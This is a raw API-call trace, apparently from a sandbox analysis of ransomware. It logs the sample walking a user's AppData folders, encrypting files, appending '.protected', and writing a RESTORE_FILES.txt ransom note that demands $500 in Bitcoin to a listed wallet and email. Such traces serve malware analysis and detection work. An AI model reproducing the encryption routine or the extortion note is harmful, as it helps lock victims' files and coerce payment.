(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.587] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.587] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\..") returned 117 [0084.587] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.587] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.587] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Windows") returned -1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Program Files") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="Program Files (x86)") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.587] lstrcmpiW (lpString1="Suggested Sites~.feed-ms", lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.587] StrStrIW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1="Suggested Sites~.feed-ms", lpString2="RESTORE_FILES.txt") returned 1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".txt") returned 0x0 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".rar") returned 0x0 [0084.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0084.588] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".zip") returned 
0x0 [0084.588] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.597] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.597] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.597] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.598] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.598] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.598] CloseHandle (hObject=0x154) returned 1 [0084.598] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.protected") returned 149 [0084.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.protected")) returned 1 [0084.599] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Windows") returned -1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files (x86)") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.599] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="System Volume Information") returned 1 [0084.599] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.599] StrStrIW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".protected") returned 0x0 [0084.599] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="RESTORE_FILES.txt") returned 1 [0084.599] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.599] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".rar") returned 0x0 [0084.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0084.600] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".zip") returned 0x0 [0084.600] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.606] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.607] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.607] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.607] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.607] CloseHandle (hObject=0x154) returned 1 [0084.608] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected") returned 151 [0084.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.protected")) returned 1 [0084.608] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.608] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.608] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt") returned 132 [0084.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.626] lstrlenA (lpString="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") returned 684 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.626] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.627] CloseHandle (hObject=0x150) returned 1 [0084.627] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.627] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.627] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt") returned 121 [0084.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.633] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.634] lstrlenA (lpString="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") returned 684 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.634] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.634] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.634] CloseHandle (hObject=0x14c) returned 1 [0084.635] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.635] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.635] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt") returned 81 [0084.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.636] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.636] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.637] lstrlenA (lpString="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") returned 684 [0084.637] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.637] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.637] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.637] CloseHandle (hObject=0xd8) returned 1 [0084.637] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Windows") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files (x86)") returned -1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="$Recycle.bin") returned 1 [0084.637] lstrcmpiW (lpString1="Feeds Cache", lpString2="System Volume Information") returned -1 [0084.637] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache") returned 69 [0084.637] lstrcmpW (lpString1="Feeds Cache", lpString2=".") returned 1 [0084.637] lstrcmpW (lpString1="Feeds Cache", lpString2="..") returned 1 [0084.637] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned 71 [0084.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.639] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.639] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.639] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.639] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\.") returned 71 [0084.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0084.639] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.639] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.639] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.639] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.639] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.639] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.639] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: 